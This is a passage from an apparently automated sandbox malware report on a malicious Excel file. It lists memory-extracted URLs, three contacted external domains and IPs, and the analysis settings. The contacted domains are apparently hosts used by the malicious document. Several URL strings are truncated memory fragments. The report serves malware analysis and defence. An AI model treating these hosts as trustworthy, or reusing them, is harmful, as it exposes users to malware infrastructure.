https://greenflag.esp./	EXCEL.EXE, 00000000.00000003.382049743.000000001330A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.292752348.000000001330A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorizeY	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://o365auditrealtimeingestion.manage.office.com	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://outlook.office365.com/api/v1.0/me/Activities	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://login.windows.net/common/oauth2/authorize_	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://sr.outlook.office.net/ws/speech/recognize/assistant/workX	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://www.odwebp.svc.msom	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://graph.windows.net/https://graph.windows.net	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeR	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeS	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/	EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeT	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau	EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://analysis.windows.net/powerbi/apiT	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://entitlement.diagnostics.office.com	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeH	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeI	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeJ	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://outlook.office.com/	EXCEL.EXE, 00000000.00000003.449854061.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.426807499.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253942258.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436557728.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.586689452.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458047571.000000000FC27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253364496.000000000FC27000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://analysis.windows.net/powerbi/apiN	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer	EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeecheJ$	EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeL	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeM	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://storage.live.com/clientlogs/uploadlocation	EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high
https://login.windows.net/common/oauth2/authorizeN	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://login.windows.net/common/oauth2/authorizeO	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	false		high
https://substrate.office.com/search/api/v1/SearchHistory	EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.2.78	playsis.com.br	United States	26337	OIS1US	false
108.179.192.98	greenflag.esp.br	United States	46606	UNIFIEDLAYER-AS-1US	false
103.28.36.171	noithat117.vn	Viet Nam	131353	NHANHOA-AS-VNNhanHoaSoftwarecompanyVN	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532593
Start date:	02.12.2021
Start time:	14:34:57
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	counter-1248368226.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.expl.winXLS@7/5@3/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 5
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
